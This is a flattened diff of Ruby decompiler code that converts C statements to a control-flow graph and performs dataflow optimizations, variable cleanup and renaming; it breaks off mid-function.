sideeffect(exp.rexpr, scope) + else true # failsafe + end + end + + # converts C code to a graph of cexprs (nodes = cexprs, edges = codepaths) + # returns a CGraph + class CGraph + # exprs: label => [exprs], to: label => [labels], block: label => are exprs standalone (vs If#test), start: 1st label + attr_accessor :exprs, :to, :block, :start, :to_optim, :from_optim + end + def c_to_graph(st) + g = CGraph.new + g.exprs = {} # label => [exprs] + g.to = {} # label => [labels] + g.block = {} # label => is label in a block? (vs If#test) + anon_label = 0 # when no label is there, use anon_label++ + # converts C code to a graph of codepath of cexprs + to_graph = lambda { |stmt, l_cur, l_after, l_cont, l_break| + case stmt + when C::Label; g.to[l_cur] = [stmt.name] ; g.to[stmt.name] = [l_after] + when C::Goto; g.to[l_cur] = [stmt.target] + when C::Continue; g.to[l_cur] = [l_cont] + when C::Break; g.to[l_cur] = [l_break] + when C::CExpression + g.exprs[l_cur] = [stmt] + g.to[l_cur] = [l_after] + when C::Return + g.exprs[l_cur] = [stmt.value] if stmt.value + g.to[l_cur] = [] + when C::Block + to_graph[stmt.statements, l_cur, l_after, l_cont, l_break] + when ::Array + g.exprs[l_cur] = [] + g.block[l_cur] = true + stmt.each_with_index { |s, i| + case s + when C::Declaration + when C::CExpression + g.exprs[l_cur] << s + else + l = anon_label += 1 + ll = anon_label += 1 + g.to[l_cur] = [l] + g.block[l_cur] = true + to_graph[stmt[i], l, ll, l_cont, l_break] + l_cur = ll + g.exprs[l_cur] = [] + end + } + g.to[l_cur] = [l_after].compact + when C::If + g.exprs[l_cur] = [stmt.test] + lt = anon_label += 1 + to_graph[stmt.bthen, lt, l_after, l_cont, l_break] + le = anon_label += 1 + to_graph[stmt.belse, le, l_after, l_cont, l_break] + g.to[l_cur] = [lt, le] + when C::While, C::DoWhile + la = anon_label += 1 + if stmt.kind_of? C::DoWhile + lt, lb = la, l_cur + else + lt, lb = l_cur, la + end + g.exprs[lt] = [stmt.test] + g.to[lt] = [lb, l_after] + to_graph[stmt.body, lb, lt, lt, l_after] + when C::Asm, nil; g.to[l_cur] = [l_after] + else puts "to_graph unhandled #{stmt.class}: #{stmt}" if $VERBOSE + end + } + + g.start = anon_label + to_graph[st, g.start, nil, nil, nil] + + # optimize graph + g.to_optim = {} + g.to.each { |k, v| g.to_optim[k] = v.uniq } + g.exprs.delete_if { |k, v| v == [] } + g.to_optim.delete_if { |k, v| + if v.length == 1 and not g.exprs[k] and v != [k] + g.to_optim.each_value { |t| if i = t.index(k) ; t[i] = v.first ; end } + true + elsif v.length == 0 and not g.exprs[k] + g.to_optim.each_value { |t| t.delete k } + true + end + } + + g.from_optim = {} + g.to_optim.each { |k, v| v.each { |t| (g.from_optim[t] ||= []) << k } } + + g + end + + # dataflow optimization + # condenses expressions (++x; if (x) => if (++x)) + # remove local var assignment (x = 1; f(x); x = 2; g(x); => f(1); g(2); etc) + def optimize_vars(scope) + return if forbid_optimize_dataflow + + g = c_to_graph(scope) + + # walks a cexpr in evaluation order (not strictly, but this is not strictly defined anyway..) + # returns the first subexpr to read var in ce + # returns :write if var is rewritten + # returns nil if var not read + # may return a cexpr var += 2 + find_next_read_ce = lambda { |ce_, var| + walk_ce(ce_, true) { |ce| + case ce.op + when :funcall + break ce if ce.lexpr == var or ce.rexpr.find { |a| a == var } + when :'=' + # a=a / a=a+1 => yield a, not :write + break ce if ce.rexpr == var + break :write if ce.lexpr == var + else + break ce if ce.lexpr == var or ce.rexpr == var + end + } + } + + # badlabels is a list of labels that may be reached without passing through the first invocation block + find_next_read_rec = lambda { |label, idx, var, done, badlabels| + next if done.include? label + done << label if idx == 0 + + idx += 1 while ce = g.exprs[label].to_a[idx] and not ret = find_next_read_ce[ce, var] + next ret if ret + + to = g.to_optim[label].to_a.map { |t| + break [:split] if badlabels.include? t + find_next_read_rec[t, 0, var, done, badlabels] + }.compact + + tw = to - [:write] if to.include? :split or tw.length > 1 - :split - elsif tw.length == 1 - tw.first - elsif to.include? :write - :write - end - } - # return the previous subexpr reading var with no fwd path to another reading (otherwise split), see loop comment for reason - find_next_read = nil - find_prev_read_rec = lambda { |label, idx, var, done| - next if done.include? label - done << label if idx == g.exprs[label].length-1 - - idx -= 1 while idx >= 0 and ce = g.exprs[label].to_a[idx] and not ret = find_next_read_ce[ce, var] - if ret.kind_of? C::CExpression - fwchk = find_next_read[label, idx+1, var] - ret = fwchk if not fwchk.kind_of? C::CExpression - end - next ret if ret - - from = g.from_optim[label].to_a.map { |f| - find_prev_read_rec[f, g.exprs[f].to_a.length-1, var, done] - }.compact - - next :split if from.include? :split - fw = from - [:write] - if fw.length == 1 - fw.first - elsif fw.length > 1 - :split - elsif from.include? :write - :write - end - } - - # list of labels reachable without using a label - badlab = {} - build_badlabel = lambda { |label| - next if badlab[label] - badlab[label] = [] - todo = [g.start] - while l = todo.pop - next if l == label or badlab[label].include? l - badlab[label] << l - todo.concat g.to_optim[l].to_a - end - } - - # returns the next subexpr where var is read - # returns :write if var is written before being read - # returns :split if the codepath splits with both subpath reading or codepath merges with another - # returns nil if var is never read - # idx is the index of the first cexpr at g.exprs[label] to look at - find_next_read = lambda { |label, idx, var| - find_next_read_rec[label, idx, var, [], []] - } - find_prev_read = lambda { |label, idx, var| - find_prev_read_rec[label, idx, var, []] - } - # same as find_next_read, but returns :split if there exist a path from g.start to the read without passing through label - find_next_read_bl = lambda { |label, idx, var| - build_badlabel[label] - find_next_read_rec[label, idx, var, [], badlab[label]] - } - - # walk each node, optimize data accesses there - # replace no longer useful exprs with CExpr[nil, nil, nil], those are wiped later. - g.exprs.each { |label, exprs| - next if not g.block[label] - i = 0 - while i < exprs.length - e = exprs[i] - i += 1 - - # TODO x = x + 1 => x += 1 => ++x here, move all other optimizations after (in optim_code) - # needs also int & 0xffffffff -> int, *&var etc (decomp_type? optim_type?) - if (e.op == :'++' or e.op == :'--') and v = (e.lexpr || e.rexpr) and v.kind_of? C::Variable and - scope.symbol[v.name] and not v.type.qualifier.to_a.include? :volatile - next if !((pos = :post.to_sym) and (oe = find_next_read_bl[label, i, v]) and oe.kind_of? C::CExpression) and - !((pos = :prev.to_sym) and (oe = find_prev_read[label, i-2, v]) and oe.kind_of? C::CExpression) - next if oe.op == :& and not oe.lexpr # no &(++eax) - - # merge pre/postincrement into next/prev var usage - # find_prev_read must fwd check when it finds something, to avoid - # while(x) x++; return x; to be converted to while(x++); return x; (return wrong value) - case oe.op - when e.op - # bla(i--); --i bla(--i); --i ++i; bla(i++) => ignore - next if pos == :pre or oe.lexpr - # ++i; bla(++i) => bla(i += 2) - oe.lexpr = oe.rexpr - oe.op = ((oe.op == :'++') ? :'+=' : :'-=') - oe.rexpr = C::CExpression[2] - - when :'++', :'--' # opposite of e.op - if (pos == :post and not oe.lexpr) or (pos == :pre and not oe.rexpr) - # ++i; bla(--i) => bla(i) - # bla(i--); ++i => bla(i) - oe.op = nil - elsif pos == :post - # ++i; bla(i--) => bla(i+1) - oe.op = ((oe.op == :'++') ? :- : :+) - oe.rexpr = C::CExpression[1] - elsif pos == :pre - # bla(--i); ++i => bla(i-1) - oe.lexpr = oe.rexpr - oe.op = ((oe.op == :'++') ? :+ : :-) - oe.rexpr = C::CExpression[1] - end - when :'+=', :'-=' - # TODO i++; i += 4 => i += 5 - next - when *AssignOp - next # ++i; i |= 4 => ignore - else - if pos == :post and v == oe.lexpr; oe.lexpr = C::CExpression[e.op, v] - elsif pos == :post and v == oe.rexpr; oe.rexpr = C::CExpression[e.op, v] - elsif pos == :prev and v == oe.rexpr; oe.rexpr = C::CExpression[v, e.op] - elsif pos == :prev and v == oe.lexpr; oe.lexpr = C::CExpression[v, e.op] - else raise 'foobar' # find_dir_read failed - end - end - - i -= 1 - exprs.delete_at(i) - e.lexpr = e.op = e.rexpr = nil - - - elsif e.op == :'=' and v = e.lexpr and v.kind_of? C::Variable and scope.symbol[v.name] and - not v.type.qualifier.to_a.include? :volatile and not find_next_read_ce[e.rexpr, v] - - # reduce trivial static assignments - if (e.rexpr.kind_of? C::CExpression and iv = e.rexpr.reduce(@c_parser) and iv.kind_of? ::Integer) or - (e.rexpr.kind_of? C::CExpression and e.rexpr.op == :& and not e.rexpr.lexpr and e.rexpr.lexpr.kind_of? C::Variable) or - (e.rexpr.kind_of? C::Variable and e.rexpr.type.kind_of? C::Array) - rewritten = false - readers = [] - discard = [e] - g.exprs.each { |l, el| - el.each_with_index { |ce, ci| - if ce_write(ce, v) and [label, i-1] != [l, ci] - if ce == e - discard << ce - else - rewritten = true - break - end - elsif ce_read(ce, v) - if walk_ce(ce) { |_ce| break true if _ce.op == :& and not _ce.lexpr and _ce.rexpr == v } - # i = 2 ; j = &i =!> j = &2 - rewritten = true - break - end - readers << ce - end - } if not rewritten - } - if not rewritten - ce_patch(readers, v, C::CExpression[iv || e.rexpr]) - discard.each { |d| d.lexpr = d.op = d.rexpr = nil } - next - end - end - - case nr = find_next_read[label, i, v] - when C::CExpression - # read in one place only, try to patch rexpr in there - r = e.rexpr - - # must check for conflicts (x = y; y += 1; foo(x) =!> foo(y)) - # XXX x = a[1]; *(a+1) = 28; foo(x)... - isfunc = false - depend_vars = [] - walk_ce(C::CExpression[r]) { |ce| - isfunc = true if ce.op == :func and (not ce.lexpr.kind_of? C::Variable or - not ce.lexpr.has_attribute('pure')) # XXX is there a C attr for func depending only on staticvars+param ? - depend_vars << ce.lexpr if ce.lexpr.kind_of? C::Variable - depend_vars << ce.rexpr if ce.rexpr.kind_of? C::Variable and (ce.lexpr or ce.op != :&) # a = &v; v = 12; func(a) => func(&v) - depend_vars << ce if ce.lvalue? - depend_vars.concat(ce.rexpr.grep(C::Variable)) if ce.rexpr.kind_of? ::Array - } - depend_vars.uniq! - - # XXX x = 1; if () { x = 2; } foo(x) =!> foo(1) (find_next_read will return this) - # we'll just redo a find_next_read like - # XXX b = &a; a = 1; *b = 2; foo(a) unhandled & generate bad C - l_l = label - l_i = i - while g.exprs[l_l].to_a.each_with_index { |ce_, n_i| - next if n_i < l_i - # count occurences of read v in ce_ - cnt = 0 - bad = false - walk_ce(ce_) { |ce| - case ce.op - when :funcall - bad = true if isfunc - ce.rexpr.each { |a| cnt += 1 if a == v } - cnt += 1 if ce.lexpr == v - when :'=' - bad = true if depend_vars.include? ce.lexpr - cnt += 1 if ce.rexpr == v - else - bad = true if (ce.op == :'++' or ce.op == :'--') and depend_vars.include? ce.rexpr - bad = true if AssignOp.include? ce.op and depend_vars.include? ce.lexpr - cnt += 1 if ce.lexpr == v - cnt += 1 if ce.rexpr == v - end - } - case cnt - when 0 + :split + elsif tw.length == 1 + tw.first + elsif to.include? :write + :write + end + } + # return the previous subexpr reading var with no fwd path to another reading (otherwise split), see loop comment for reason + find_next_read = nil + find_prev_read_rec = lambda { |label, idx, var, done| + next if done.include? label + done << label if idx == g.exprs[label].length-1 + + idx -= 1 while idx >= 0 and ce = g.exprs[label].to_a[idx] and not ret = find_next_read_ce[ce, var] + if ret.kind_of? C::CExpression + fwchk = find_next_read[label, idx+1, var] + ret = fwchk if not fwchk.kind_of? C::CExpression + end + next ret if ret + + from = g.from_optim[label].to_a.map { |f| + find_prev_read_rec[f, g.exprs[f].to_a.length-1, var, done] + }.compact + + next :split if from.include? :split + fw = from - [:write] + if fw.length == 1 + fw.first + elsif fw.length > 1 + :split + elsif from.include? :write + :write + end + } + + # list of labels reachable without using a label + badlab = {} + build_badlabel = lambda { |label| + next if badlab[label] + badlab[label] = [] + todo = [g.start] + while l = todo.pop + next if l == label or badlab[label].include? l + badlab[label] << l + todo.concat g.to_optim[l].to_a + end + } + + # returns the next subexpr where var is read + # returns :write if var is written before being read + # returns :split if the codepath splits with both subpath reading or codepath merges with another + # returns nil if var is never read + # idx is the index of the first cexpr at g.exprs[label] to look at + find_next_read = lambda { |label, idx, var| + find_next_read_rec[label, idx, var, [], []] + } + find_prev_read = lambda { |label, idx, var| + find_prev_read_rec[label, idx, var, []] + } + # same as find_next_read, but returns :split if there exist a path from g.start to the read without passing through label + find_next_read_bl = lambda { |label, idx, var| + build_badlabel[label] + find_next_read_rec[label, idx, var, [], badlab[label]] + } + + # walk each node, optimize data accesses there + # replace no longer useful exprs with CExpr[nil, nil, nil], those are wiped later. + g.exprs.each { |label, exprs| + next if not g.block[label] + i = 0 + while i < exprs.length + e = exprs[i] + i += 1 + + # TODO x = x + 1 => x += 1 => ++x here, move all other optimizations after (in optim_code) + # needs also int & 0xffffffff -> int, *&var etc (decomp_type? optim_type?) + if (e.op == :'++' or e.op == :'--') and v = (e.lexpr || e.rexpr) and v.kind_of? C::Variable and + scope.symbol[v.name] and not v.type.qualifier.to_a.include? :volatile + next if !((pos = :post.to_sym) and (oe = find_next_read_bl[label, i, v]) and oe.kind_of? C::CExpression) and + !((pos = :prev.to_sym) and (oe = find_prev_read[label, i-2, v]) and oe.kind_of? C::CExpression) + next if oe.op == :& and not oe.lexpr # no &(++eax) + + # merge pre/postincrement into next/prev var usage + # find_prev_read must fwd check when it finds something, to avoid + # while(x) x++; return x; to be converted to while(x++); return x; (return wrong value) + case oe.op + when e.op + # bla(i--); --i bla(--i); --i ++i; bla(i++) => ignore + next if pos == :pre or oe.lexpr + # ++i; bla(++i) => bla(i += 2) + oe.lexpr = oe.rexpr + oe.op = ((oe.op == :'++') ? :'+=' : :'-=') + oe.rexpr = C::CExpression[2] + + when :'++', :'--' # opposite of e.op + if (pos == :post and not oe.lexpr) or (pos == :pre and not oe.rexpr) + # ++i; bla(--i) => bla(i) + # bla(i--); ++i => bla(i) + oe.op = nil + elsif pos == :post + # ++i; bla(i--) => bla(i+1) + oe.op = ((oe.op == :'++') ? :- : :+) + oe.rexpr = C::CExpression[1] + elsif pos == :pre + # bla(--i); ++i => bla(i-1) + oe.lexpr = oe.rexpr + oe.op = ((oe.op == :'++') ? :+ : :-) + oe.rexpr = C::CExpression[1] + end + when :'+=', :'-=' + # TODO i++; i += 4 => i += 5 + next + when *AssignOp + next # ++i; i |= 4 => ignore + else + if pos == :post and v == oe.lexpr; oe.lexpr = C::CExpression[e.op, v] + elsif pos == :post and v == oe.rexpr; oe.rexpr = C::CExpression[e.op, v] + elsif pos == :prev and v == oe.rexpr; oe.rexpr = C::CExpression[v, e.op] + elsif pos == :prev and v == oe.lexpr; oe.lexpr = C::CExpression[v, e.op] + else raise 'foobar' # find_dir_read failed + end + end + + i -= 1 + exprs.delete_at(i) + e.lexpr = e.op = e.rexpr = nil + + + elsif e.op == :'=' and v = e.lexpr and v.kind_of? C::Variable and scope.symbol[v.name] and + not v.type.qualifier.to_a.include? :volatile and not find_next_read_ce[e.rexpr, v] + + # reduce trivial static assignments + if (e.rexpr.kind_of? C::CExpression and iv = e.rexpr.reduce(@c_parser) and iv.kind_of? ::Integer) or + (e.rexpr.kind_of? C::CExpression and e.rexpr.op == :& and not e.rexpr.lexpr and e.rexpr.lexpr.kind_of? C::Variable) or + (e.rexpr.kind_of? C::Variable and e.rexpr.type.kind_of? C::Array) + rewritten = false + readers = [] + discard = [e] + g.exprs.each { |l, el| + el.each_with_index { |ce, ci| + if ce_write(ce, v) and [label, i-1] != [l, ci] + if ce == e + discard << ce + else + rewritten = true + break + end + elsif ce_read(ce, v) + if walk_ce(ce) { |_ce| break true if _ce.op == :& and not _ce.lexpr and _ce.rexpr == v } + # i = 2 ; j = &i =!> j = &2 + rewritten = true + break + end + readers << ce + end + } if not rewritten + } + if not rewritten + ce_patch(readers, v, C::CExpression[iv || e.rexpr]) + discard.each { |d| d.lexpr = d.op = d.rexpr = nil } + next + end + end + + case nr = find_next_read[label, i, v] + when C::CExpression + # read in one place only, try to patch rexpr in there + r = e.rexpr + + # must check for conflicts (x = y; y += 1; foo(x) =!> foo(y)) + # XXX x = a[1]; *(a+1) = 28; foo(x)... + isfunc = false + depend_vars = [] + walk_ce(C::CExpression[r]) { |ce| + isfunc = true if ce.op == :func and (not ce.lexpr.kind_of? C::Variable or + not ce.lexpr.has_attribute('pure')) # XXX is there a C attr for func depending only on staticvars+param ? + depend_vars << ce.lexpr if ce.lexpr.kind_of? C::Variable + depend_vars << ce.rexpr if ce.rexpr.kind_of? C::Variable and (ce.lexpr or ce.op != :&) # a = &v; v = 12; func(a) => func(&v) + depend_vars << ce if ce.lvalue? + depend_vars.concat(ce.rexpr.grep(C::Variable)) if ce.rexpr.kind_of? ::Array + } + depend_vars.uniq! + + # XXX x = 1; if () { x = 2; } foo(x) =!> foo(1) (find_next_read will return this) + # we'll just redo a find_next_read like + # XXX b = &a; a = 1; *b = 2; foo(a) unhandled & generate bad C + l_l = label + l_i = i + while g.exprs[l_l].to_a.each_with_index { |ce_, n_i| + next if n_i < l_i + # count occurences of read v in ce_ + cnt = 0 + bad = false + walk_ce(ce_) { |ce| + case ce.op + when :funcall + bad = true if isfunc + ce.rexpr.each { |a| cnt += 1 if a == v } + cnt += 1 if ce.lexpr == v + when :'=' + bad = true if depend_vars.include? ce.lexpr + cnt += 1 if ce.rexpr == v + else + bad = true if (ce.op == :'++' or ce.op == :'--') and depend_vars.include? ce.rexpr + bad = true if AssignOp.include? ce.op and depend_vars.include? ce.lexpr + cnt += 1 if ce.lexpr == v + cnt += 1 if ce.rexpr == v + end + } + case cnt + when 0 break if bad - next - when 1 # good - break if e.complexity > 10 and ce_.complexity > 3 # try to keep the C readable - # x = 1; y = x; z = x; => cannot suppress x - nr = find_next_read[l_l, n_i+1, v] - break if (nr.kind_of? C::CExpression or nr == :split) and not walk_ce(ce_) { |ce| break true if ce.op == :'=' and ce.lexpr == v } - else break # a = 1; b = a + a => fail - end - - # TODO XXX x = 1; y = x; z = x; - res = walk_ce(ce_, true) { |ce| - case ce.op - when :funcall - if ce.rexpr.to_a.each_with_index { |a,i_| - next if a != v - ce.rexpr[i_] = r - break :done - } == :done - break :done - elsif ce.lexpr == v - ce.lexpr = r - break :done - elsif isfunc - break :fail - end - when *AssignOp - break :fail if not ce.lexpr and depend_vars.include? ce.rexpr # ++depend - if ce.rexpr == v - ce.rexpr = r - break :done - elsif ce.lexpr == v or depend_vars.include? ce.lexpr - break :fail - end - else - break :fail if ce.op == :& and not ce.lexpr and ce.rexpr == v - if ce.lexpr == v - ce.lexpr = r - break :done - elsif ce.rexpr == v - ce_.type = r.type if not ce_.op and ce_.rexpr == v # return (int32)eax - ce.rexpr = r - break :done - end - end - } - case res - when :done - i -= 1 - exprs.delete_at(i) - e.lexpr = e.op = e.rexpr = nil - break - when :fail - break - end - } - # ignore branches that will never reuse v - may_to = g.to_optim[l_l].find_all { |to| find_next_read[to, 0, v].kind_of? C::CExpression } - if may_to.length == 1 and to = may_to.first and to != l_l and g.from_optim[to] == [l_l] - l_i = 0 - l_l = to - else break - end - end - - when nil, :write - # useless assignment (value never read later) - # XXX foo = &bar; bar = 12; baz(*foo) - e.replace(C::CExpression[e.rexpr]) - # remove sideeffectless subexprs - loop do - case e.op - when :funcall, *AssignOp - else - l = (e.lexpr.kind_of? C::CExpression and sideeffect(e.lexpr)) - r = (e.rexpr.kind_of? C::CExpression and sideeffect(e.rexpr)) - if l and r # could split... - elsif l - e.replace(e.lexpr) - next - elsif r - e.replace(e.rexpr) - next - else # remove the assignment altogether - i -= 1 - exprs.delete_at(i) - e.lexpr = e.op = e.rexpr = nil - end - end - break - end - end - end - end - } - - # wipe cexprs marked in the previous step - walk(scope) { |st| - next if not st.kind_of? C::Block - st.statements.delete_if { |e| e.kind_of? C::CExpression and not e.lexpr and not e.op and not e.rexpr } - } - - # reoptimize cexprs - walk_ce(scope, true) { |ce| - # redo some simplification that may become available after variable propagation - # int8 & 255 => int8 - if ce.op == :& and ce.lexpr and ce.lexpr.type.integral? and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == (1 << (8*sizeof(ce.lexpr))) - 1 - ce.replace C::CExpression[ce.lexpr] - end - - # int *ptr; *(ptr + 4) => ptr[4] - if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :+ and var = ce.rexpr.lexpr and var.kind_of? C::Variable and var.type.pointer? - ce.lexpr, ce.op, ce.rexpr = ce.rexpr.lexpr, :'[]', ce.rexpr.rexpr - end - - # useless casts - if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and (ce.rexpr.rexpr.kind_of? C::CExpression or - (ce.type.pointer? and ce.rexpr.rexpr == 0 and not ce.type.pointed.untypedef.kind_of? C::Union)) # keep ((struct*)0)->memb - ce.rexpr = ce.rexpr.rexpr - end - if not ce.op and ce.rexpr.kind_of? C::CExpression and (ce.type == ce.rexpr.type or (ce.type.integral? and ce.rexpr.type.integral?)) - ce.replace ce.rexpr - end - # useless casts (type)*((oeua)Ptype) - if not ce.op and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :* and not ce.rexpr.lexpr and ce.rexpr.rexpr.kind_of? C::CExpression and not ce.rexpr.rexpr.op and - p = ce.rexpr.rexpr.rexpr and p.kind_of? C::Typed and p.type.pointer? and ce.type == p.type.pointed - ce.op = ce.rexpr.op - ce.rexpr = ce.rexpr.rexpr.rexpr - end - # (a > 0) != 0 - if ce.op == :'!=' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and ce.lexpr.kind_of? C::CExpression and - [:<, :<=, :>, :>=, :'==', :'!=', :'!'].include? ce.lexpr.op - ce.replace ce.lexpr - end - # a == 0 => !a - if ce.op == :== and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 - ce.replace C::CExpression[:'!', ce.lexpr] - end - # !(int)a => !a - if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? C::CExpression - ce.rexpr = ce.rexpr.rexpr - end - # (int)a < (int)b => a < b TODO uint <-> int - if [:<, :<=, :>, :>=].include? ce.op and ce.rexpr.kind_of? C::CExpression and ce.lexpr.kind_of? C::CExpression and not ce.rexpr.op and not ce.lexpr.op and - ce.rexpr.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.type.pointer? and ce.lexpr.rexpr.kind_of? C::CExpression and ce.lexpr.rexpr.type.pointer? - ce.rexpr = ce.rexpr.rexpr - ce.lexpr = ce.lexpr.rexpr - end - - # a & 3 & 1 - while (ce.op == :& or ce.op == :|) and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and - ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == ce.op and ce.lexpr.lexpr and - ce.lexpr.rexpr.kind_of? C::CExpression and ce.lexpr.rexpr.rexpr.kind_of? ::Integer - ce.lexpr, ce.rexpr.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr.rexpr.send(ce.op, ce.rexpr.rexpr) - end - - # x = x | 4 => x |= 4 - if ce.op == :'=' and ce.rexpr.kind_of? C::CExpression and [:+, :-, :*, :/, :|, :&, :^, :>>, :<<].include? ce.rexpr.op and ce.rexpr.lexpr == ce.lexpr - ce.op = (ce.rexpr.op.to_s + '=').to_sym - ce.rexpr = ce.rexpr.rexpr - end - - # x += 1 => ++x - if (ce.op == :'+=' or ce.op == :'-=') and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 - ce.lexpr, ce.op, ce.rexpr = nil, {:'+=' => :'++', :'-=' => :'--'}[ce.op], ce.lexpr - end - - # --x+1 => x-- - if (ce.op == :+ or ce.op == :-) and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == {:+ => :'--', :- => :'++'}[ce.op] and - ce.lexpr.rexpr and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 - ce.lexpr, ce.op, ce.rexpr = ce.lexpr.rexpr, ce.lexpr.op, nil - end - } - end - - def remove_unreferenced_vars(scope) - used = {} - walk_ce(scope) { |ce| - # remove unreferenced local vars - used[ce.rexpr.name] = true if ce.rexpr.kind_of? C::Variable - used[ce.lexpr.name] = true if ce.lexpr.kind_of? C::Variable - ce.rexpr.each { |v| used[v.name] = true if v.kind_of? C::Variable } if ce.rexpr.kind_of?(::Array) - } - unused = scope.symbol.keys.find_all { |n| not used[n] } - unused.each { |v| scope.symbol[v].add_attribute 'unused' } # fastcall args need it - scope.statements.delete_if { |sm| sm.kind_of? C::Declaration and unused.include? sm.var.name } - scope.symbol.delete_if { |n, v| unused.include? n } - end - - def finalize - optimize_global - true - end - - def optimize_global - # check all global vars (pointers to global data) - tl = @c_parser.toplevel - vars = tl.symbol.keys.find_all { |k| tl.symbol[k].kind_of? C::Variable and not tl.symbol[k].type.kind_of? C::Function } - countref = Hash.new(0) - - walk_ce(tl) { |ce| - # XXX int foo; void bar() { int foo; } => false negative - countref[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable - countref[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable - } - - vars.delete_if { |v| countref[v] == 0 } - countref.delete_if { |k, v| not vars.include? k } - - # by default globals are C::Arrays - # if all references are *foo, dereference the var type - # TODO allow foo to appear (change to &foo) (but still disallow casts/foo+12 etc) - countderef = Hash.new(0) - walk_ce(tl) { |ce| - if ce.op == :* and not ce.lexpr - r = ce.rexpr - elsif ce.op == :'->' - r = C::CExpression[ce.lexpr] - else next - end - # compare type.type cause var is an Array and the cast is a Pointer - countderef[r.rexpr.name] += 1 if r.kind_of? C::CExpression and not r.op and r.rexpr.kind_of? C::Variable and - sizeof(nil, r.type.type) == sizeof(nil, r.rexpr.type.type) rescue nil - } - vars.each { |n| - if countref[n] == countderef[n] - v = tl.symbol[n] - target = C::CExpression[:*, [v]] - v.type = v.type.type - v.initializer = v.initializer.first if v.initializer.kind_of? ::Array - walk_ce(tl) { |ce| - if ce.op == :'->' and C::CExpression[ce.lexpr] == C::CExpression[v] - ce.op = :'.' - elsif ce.lexpr == target - ce.lexpr = v - end - ce.rexpr = v if ce.rexpr == target - ce.lexpr, ce.op, ce.rexpr = nil, nil, v if ce == target - } - end - } - - # if a global var appears only in one function, make it a static variable - tl.statements.each { |st| - next if not st.kind_of? C::Declaration or not st.var.type.kind_of? C::Function or not scope = st.var.initializer - localcountref = Hash.new(0) - walk_ce(scope) { |ce| - localcountref[ce.rexpr.name] += 1 if ce.rexpr.kind_of? C::Variable - localcountref[ce.lexpr.name] += 1 if ce.lexpr.kind_of? C::Variable - } - - vars.delete_if { |n| - next if scope.symbol[n] - next if localcountref[n] != countref[n] - v = tl.symbol.delete(n) - tl.statements.delete_if { |d| d.kind_of? C::Declaration and d.var.name == n } - - if countref[n] == 1 and v.initializer.kind_of? C::CExpression and v.initializer.rexpr.kind_of? String - walk_ce(scope) { |ce| - if ce.rexpr.kind_of? C::Variable and ce.rexpr.name == n - if not ce.op - ce.replace v.initializer - else - ce.rexpr = v.initializer - end - elsif ce.lexpr.kind_of? C::Variable and ce.lexpr.name == n - ce.lexpr = v.initializer - end - } - else - v.storage = :static - scope.symbol[v.name] = v - scope.statements.unshift C::Declaration.new(v) - end - - true - } - } - end - - # reorder statements to put decl first, move assignments to decl, move args to func prototype - def cleanup_var_decl(scope, func) - scope.symbol.each_value { |v| v.type = C::BaseType.new(:int) if v.type.void? } - - args = func.type.args - decl = [] - scope.statements.delete_if { |sm| - next if not sm.kind_of? C::Declaration - if sm.var.stackoff.to_i > 0 and sm.var.name !~ /_a(\d+)$/ # aliased vars: use 1st domain only - args << sm.var - else - decl << sm - end - true - } - - # move trivial affectations to initialiser - # XXX a = 1 ; b = a ; a = 2 - go = true # break from delete_if does not delete.. - scope.statements.delete_if { |st| - if go and st.kind_of? C::CExpression and st.op == :'=' and st.rexpr.kind_of? C::CExpression and not st.rexpr.op and - st.rexpr.rexpr.kind_of? ::Integer and st.lexpr.kind_of? C::Variable and scope.symbol[st.lexpr.name] - st.lexpr.initializer = st.rexpr - else - go = false - end - } - - # reorder declarations - scope.statements[0, 0] = decl.sort_by { |sm| [-sm.var.stackoff.to_i, sm.var.name] } - - # ensure arglist has no hole (create&add unreferenced args) - func.type.args = [] - argoff = @c_parser.typesize[:ptr] - args.sort_by { |sm| sm.stackoff.to_i }.each { |a| - # XXX misalignment ? - if not curoff = a.stackoff - func.type.args << a # __fastcall - next - end - while curoff > argoff - wantarg = C::Variable.new - wantarg.name = scope.decompdata[:stackoff_name][argoff] || stackoff_to_varname(argoff) - wantarg.type = C::BaseType.new(:int) - wantarg.attributes = ['unused'] - func.type.args << wantarg - scope.symbol[wantarg.name] = wantarg - argoff += @c_parser.typesize[:ptr] - end - func.type.args << a - argoff += @c_parser.typesize[:ptr] - } - end - - # rename local variables from subfunc arg names - def rename_variables(scope) - funcs = [] - cntrs = [] - cmpi = [] - - walk_ce(scope) { |ce| - funcs << ce if ce.op == :funcall - cntrs << (ce.lexpr || ce.rexpr) if ce.op == :'++' - cmpi << ce.lexpr if [:<, :>, :<=, :>=, :==, :'!='].include? ce.op and ce.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.kind_of? ::Integer - } - - rename = lambda { |var, name| - var = var.rexpr if var.kind_of? C::CExpression and not var.op - next if not var.kind_of? C::Variable or not scope.symbol[var.name] or not name - next if (var.name !~ /^(var|arg)_/ and not var.storage == :register) or not scope.symbol[var.name] or name =~ /^(var|arg)_/ - s = scope.symbol_ancestors - n = name - i = 0 - n = name + "#{i+=1}" while s[n] - scope.symbol[n] = scope.symbol.delete(var.name) - var.name = n - } - - funcs.each { |ce| - next if not ce.lexpr.kind_of? C::Variable or not ce.lexpr.type.kind_of? C::Function - ce.rexpr.to_a.zip(ce.lexpr.type.args.to_a).each { |a, fa| rename[a, fa.name] if fa } - } - funcs.each { |ce| - next if not ce.lexpr.kind_of? C::Variable or not ce.lexpr.type.kind_of? C::Function - 